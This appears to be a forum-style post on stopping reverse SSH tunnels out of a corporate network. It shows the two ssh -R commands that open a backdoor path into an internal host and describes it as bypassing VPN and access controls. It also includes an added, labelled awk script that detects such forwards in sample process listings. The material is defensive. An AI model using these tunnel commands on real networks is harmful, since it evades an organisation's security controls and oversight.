Can we prevent a reverse SSH tunnel from being established between a corporate network and a public domain system?
If I can establish an SSH connection from a corporate internal host to an external host, using the -R option to open port 2222 on the external host and forward it back to port 22 on the internal system, then the external host can connect back into the internal host.
1. internal$ ssh -R 2222:127.0.0.1:22 external.example.ext
2. external$ ssh -p 2222 127.0.0.1
Here I am establishing a tunnel inside another one, completely bypassing all access restrictions and VPN requirements. This type of connection establishes an external gateway to the internal host without the knowledge of the corporate network. The external gateway will control all the traffic to the internal network.
The best way to restrict this kind of activity is to have a bridge server in the corporate network from which a remote user can SSH to any internal server. No user should be able to SSH directly to or from the corporate network.
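As a complement to the bridge server, internal hosts can be audited for ssh clients started with a remote forward such as the -R 2222:127.0.0.1:22 shown above. The following is an added example, not part of the original post; the function names find_reverse_forwards and sample_ps and the process listing are constructed for illustration, and the input is assumed to have the shape of `ps -eo pid=,user=,args=` output.

```shell
#!/bin/sh
# Added example: flag ssh clients that request a remote (reverse) forward.
# Input: "PID USER ARGS..." lines, e.g. from `ps -eo pid=,user=,args=`.
# Output: "PID USER <forward spec>" for each match.
find_reverse_forwards() {
  awk '
  # OpenSSH client options that consume an argument (-R is handled below).
  BEGIN { takes_arg = "BbcDEeFIiJLlmOoPpQSWw" }
  {
    cmd = $3; sub(/.*\//, "", cmd)          # strip any path: /usr/bin/ssh -> ssh
    if (cmd != "ssh") next
    hit = ""; pos = 0
    for (i = 4; i <= NF && hit == ""; i++) {
      a = $i
      if (a !~ /^-./) {                      # 1st bare word = host, 2nd = remote command
        if (++pos == 2) break
        continue
      }
      for (j = 2; j <= length(a); j++) {     # walk clustered flags such as -fNR
        c = substr(a, j, 1); rest = substr(a, j + 1)
        if (c == "R") {                      # spec is attached or in the next word
          hit = (rest != "") ? rest : $(++i)
          break
        }
        if (index(takes_arg, c)) {           # rest of the word (or next word) is a value
          val = (rest != "") ? rest : $(++i)
          if (c == "o" && tolower(val) ~ /^remoteforward/) hit = val
          break
        }
      }
    }
    if (hit != "") print $1, $2, hit
  }'
}

# Constructed sample process listing (not real data).
sample_ps() {
cat <<'EOF'
4101 alice ssh -R 2222:127.0.0.1:22 external.example.ext
4102 bob /usr/bin/ssh -fNR2222:127.0.0.1:22 external.example.ext
4103 carol ssh -o RemoteForward=2222 -p 443 external.example.ext
4104 dave ssh -lRoot -i /home/dave/.ssh/R_key bridge.corp.example
4105 erin ssh bridge.corp.example grep -R TODO /srv
4106 root sshd: alice@pts/0
EOF
}

sample_ps | find_reverse_forwards
```

Command-line inspection cannot see a RemoteForward directive set in a user's ssh_config, so this audit supplements the egress restriction through the bridge server and does not replace it.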